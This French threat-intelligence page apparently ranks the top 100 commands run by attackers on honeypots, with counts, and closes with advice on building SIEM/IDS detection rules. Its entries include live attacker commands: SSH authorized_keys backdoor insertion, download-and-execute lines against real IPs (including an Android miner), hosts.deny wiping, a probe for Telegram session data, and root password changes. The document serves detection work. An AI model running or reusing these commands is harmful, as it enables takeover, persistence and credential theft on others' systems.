TROYANOSYVIRUS
Mis à jour : mai 2026

Top 100 des commandes malveillantes

Les commandes les plus exécutées par les attaquants après avoir obtenu l'accès au système. Utile pour la détection d'intrusions et la réponse aux incidents.

1 397 commandes en 24 h
1.
$Enter new UNIX password:
32 IPs88x
2.
$uname -a
42 IPs58x
3.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
42 IPs58x
4.
$lockr -ia .ssh
42 IPs58x
5.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
41 IPs57x
6.
$w
40 IPs56x
7.
$uname -m
40 IPs56x
8.
$top
40 IPs56x
9.
$uname
40 IPs56x
10.
$which ls
40 IPs56x
11.
$cat /proc/cpuinfo | grep model | grep name | wc -l
40 IPs56x
12.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
40 IPs56x
13.
$cat /proc/cpuinfo | grep name | wc -l
40 IPs56x
14.
$ls -lh $(which ls)
40 IPs56x
15.
$crontab -l
40 IPs56x
16.
$whoami
39 IPs55x
17.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
39 IPs55x
18.
$lscpu | grep Model
39 IPs55x
19.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
38 IPs54x
20.
$/bin/./uname -s -v -n -r -m
13 IPs38x
21.
$cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://89.32.41.16/bins/parm7 2>/dev/null||busybox wget -qO b http://89.32.41.16/bins/parm7 2>/dev/null||curl -so b http://89.32.41.16/bins/parm7 2>/dev/null||toybox wget -qO b http://89.32.41.16/bins/parm7 2>/dev/null);chmod 777 b 2>/dev/null;(su 0 ./b adb||./b adb) 2>/dev/null;rm -f b;(wget -qO b http://89.32.41.16/bins/parm5 2>/dev/null||busybox wget -qO b http://89.32.41.16/bins/parm5 2>/dev/null||curl -so b http://89.32.41.16/bins/pa
1 IPs18x
22.
$uname -s -v -n -r -m
5 IPs14x
23.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
11 IPs12x
24.
$PING
5 IPs10x
25.
$/ip cloud print
3 IPs6x
26.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
2 IPs4x
27.
$chmod 0755 /data/local/tmp/trinity
2 IPs4x
28.
$chmod 0755 /data/local/tmp/nohup
2 IPs4x
29.
$Accept-Encoding: gzip
2 IPs4x
30.
$pm install /data/local/tmp/ufo.apk
2 IPs4x
31.
$pm path com.ufo.miner
2 IPs4x
32.
$ps | grep trinity
2 IPs4x
33.
$rm -f /data/local/tmp/ufo.apk
2 IPs4x
34.
$rm -rf /data/local/tmp/*
2 IPs4x
35.
$am start -n com.ufo.miner/com.example.test.MainActivity
2 IPs4x
36.
$/data/local/tmp/nohup /data/local/tmp/trinity
2 IPs4x
37.
$cat /proc/cpuinfo
3 IPs3x
38.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
3 IPs3x
39.
$cd /data/local/tmp/; busybox wget http://176.65.139.20/w.sh; sh w.sh android.exploit; curl http://176.65.139.20/c.sh; sh c.sh android.exploit
1 IPs3x
40.
$ifconfig
3 IPs3x
41.
$locate D877F783D5D3EF8Cs
3 IPs3x
42.
$cd /data/local/tmp/; busybox wget http://83.168.110.191/cat.sh; sh cat.sh; curl http://83.168.110.191/cat.sh; sh cat.sh; wget http://83.168.110.191/cat.sh; sh cat.sh; curl http://83.168.110.191/cat.sh; sh cat.sh; busybox wget http://83.168.110.191/cat.sh; sh cat.sh; busybox curl http://83.168.110.191/cat.sh; sh cat.sh
1 IPs3x
43.
$echo Hi | cat -n
3 IPs3x
44.
$ps -ef | grep '[Mm]iner'
3 IPs3x
45.
$ps | grep '[Mm]iner'
3 IPs3x
46.
$?
1 IPs2x
47.
$linuxshell
1 IPs2x
48.
$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"
1 IPs2x
49.
$shell
1 IPs2x
50.
$start
1 IPs2x
51.
$system
1 IPs2x
52.
$config terminal
1 IPs2x
53.
$>/data/local/tmp/.gtconfig && cd /data/local/tmp; >/sdcard/0/Downloads/.gtconfig && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wwg bwwg bbcl ccl; wget http://85.239.151.41/wwg; sh wwg; busybox wget http://85.239.151.41/bwwg; sh bwwg; busybox ccl http://85.239.151.41/bbcl > bbcl; sh bbcl; ccl http://85.239.151.41/ccl > ccl; sh ccl
1 IPs2x
54.
$adminpass
1 IPs2x
55.
$echo "root:d0dLaYGDTdok"|chpasswd|bash
1 IPs1x
56.
$echo "root:eGmh7zymjV4y"|chpasswd|bash
1 IPs1x
57.
$echo "root:niayk6mjZgrn"|chpasswd|bash
1 IPs1x
58.
$echo "root:pwPPxUhCPri2"|chpasswd|bash
1 IPs1x
59.
$echo "root:saUNg8VG8CzB"|chpasswd|bash
1 IPs1x
60.
$echo "user100\nBn05hxwncoqo\nBn05hxwncoqo\n"|passwd
1 IPs1x
61.
$echo "vikram\nZ1GGxR1dIIgv\nZ1GGxR1dIIgv\n"|passwd
1 IPs1x
62.
$echo "xxlx123xxlx\n2xTXSjegGp2I\n2xTXSjegGp2I\n"|passwd
1 IPs1x
63.
$echo -e "123123\njPJVR4svvpcH\njPJVR4svvpcH"|passwd|bash
1 IPs1x
64.
$echo -e "12345678\nVqyeZ1DCEv4P\nVqyeZ1DCEv4P"|passwd|bash
1 IPs1x
65.
$echo -e "12345678\nZnpRL6QQ2qnQ\nZnpRL6QQ2qnQ"|passwd|bash
1 IPs1x
66.
$echo -e "123456\nGD7XFFpokPJO\nGD7XFFpokPJO"|passwd|bash
1 IPs1x
67.
$echo -e "123456a@\nAZHs0Ma0QF4A\nAZHs0Ma0QF4A"|passwd|bash
1 IPs1x
68.
$echo -e "123456a@\nTpaTLOafvSFc\nTpaTLOafvSFc"|passwd|bash
1 IPs1x
69.
$echo -e "1234\nIexkPAndMbQ6\nIexkPAndMbQ6"|passwd|bash
1 IPs1x
70.
$echo -e "1qaz2wsx\nooJMynQwO7Zk\nooJMynQwO7Zk"|passwd|bash
1 IPs1x
71.
$echo -e "Aa12345!\nMVbxAUcfyp8V\nMVbxAUcfyp8V"|passwd|bash
1 IPs1x
72.
$echo -e "Aa12345!\ntYcJNtoVAX53\ntYcJNtoVAX53"|passwd|bash
1 IPs1x
73.
$echo -e "Aa12345!\ntnBOr8VYZtsP\ntnBOr8VYZtsP"|passwd|bash
1 IPs1x
74.
$echo -e "Aa123456789\nojrrkMBEXdPY\nojrrkMBEXdPY"|passwd|bash
1 IPs1x
75.
$echo -e "Pa$$word1\nJ7OkxMphMxem\nJ7OkxMphMxem"|passwd|bash
1 IPs1x
76.
$echo -e "Pa$$word1\nedkg3RYhDq1h\nedkg3RYhDq1h"|passwd|bash
1 IPs1x
77.
$echo -e "Passw0rd\njjCZGqLRWoN9\njjCZGqLRWoN9"|passwd|bash
1 IPs1x
78.
$echo -e "Passw0rd\nzVSfKrwJhZEU\nzVSfKrwJhZEU"|passwd|bash
1 IPs1x
79.
$echo -e "TestUser\nEvCVB0zclJWN\nEvCVB0zclJWN"|passwd|bash
1 IPs1x
80.
$echo -e "Welcome1\ndBLtMdP8eG8T\ndBLtMdP8eG8T"|passwd|bash
1 IPs1x
81.
$echo -e "Welcome1\nltn9rdYm0NYN\nltn9rdYm0NYN"|passwd|bash
1 IPs1x
82.
$echo -e "debian2022\nEsLXjKeLW2vZ\nEsLXjKeLW2vZ"|passwd|bash
1 IPs1x
83.
$echo -e "dev#123\nXZVu3djER8ug\nXZVu3djER8ug"|passwd|bash
1 IPs1x
84.
$echo -e "digitalizacion\nSw62PktuLVsW\nSw62PktuLVsW"|passwd|bash
1 IPs1x
85.
$echo -e "git123git\n5GUkuSNhWNJ8\n5GUkuSNhWNJ8"|passwd|bash
1 IPs1x
86.
$echo -e "gitlab\nIw8i1QnWyCqw\nIw8i1QnWyCqw"|passwd|bash
1 IPs1x
87.
$echo -e "guest2024\nLF5YlgrvqKWr\nLF5YlgrvqKWr"|passwd|bash
1 IPs1x
88.
$echo -e "hduser\n1nalzlEl8vfZ\n1nalzlEl8vfZ"|passwd|bash
1 IPs1x
89.
$echo -e "hgfdsa\n5t5SlsDkZI3J\n5t5SlsDkZI3J"|passwd|bash
1 IPs1x
90.
$echo -e "hgfdsa\naomw3nf1ugO9\naomw3nf1ugO9"|passwd|bash
1 IPs1x
91.
$echo -e "hgfdsa\nd2YlySTAbfoK\nd2YlySTAbfoK"|passwd|bash
1 IPs1x
92.
$echo -e "mypassword\n3Jm8VO66Glgm\n3Jm8VO66Glgm"|passwd|bash
1 IPs1x
93.
$echo -e "mypassword\nUVgxXKnzIadg\nUVgxXKnzIadg"|passwd|bash
1 IPs1x
94.
$echo -e "oracle@12345\nzphxSf8ntWEa\nzphxSf8ntWEa"|passwd|bash
1 IPs1x
95.
$echo -e "passw0rd\nIGGrKTcLB1km\nIGGrKTcLB1km"|passwd|bash
1 IPs1x
96.
$echo -e "password@123\nFe87vUXNLgOb\nFe87vUXNLgOb"|passwd|bash
1 IPs1x
97.
$echo -e "qwer1234\nLYas4GwRNVwO\nLYas4GwRNVwO"|passwd|bash
1 IPs1x
98.
$echo -e "qwer1234\nq5F9vvc2Jfo3\nq5F9vvc2Jfo3"|passwd|bash
1 IPs1x
99.
$echo -e "qwer1234\nrPozEsTXdNDh\nrPozEsTXdNDh"|passwd|bash
1 IPs1x
100.
$echo -e "qwer1234\nrnI41w3IVVxL\nrnI41w3IVVxL"|passwd|bash
1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Téléchargement

wget, curl, tftp

Persistance

crontab, chmod, chattr

Mouvement latéral

ssh, scp, ping

Utilisation pour la détection

Ces commandes peuvent être utilisées pour créer des règles de détection dans les SIEM, IDS/IPS et systèmes de surveillance. Surveillez ces modèles dans vos logs pour détecter les intrusions. Prises isolément, plusieurs de ces commandes (uname, w, top, crontab -l) sont courantes en usage légitime : pour limiter les faux positifs, faites porter les règles sur leur enchaînement rapproché dans une même session et sur les indicateurs plus spécifiques de la liste, comme la modification de .ssh/authorized_keys après chattr -ia, les changements de mot de passe via chpasswd ou passwd en pipeline, et les téléchargements depuis des adresses IP brutes.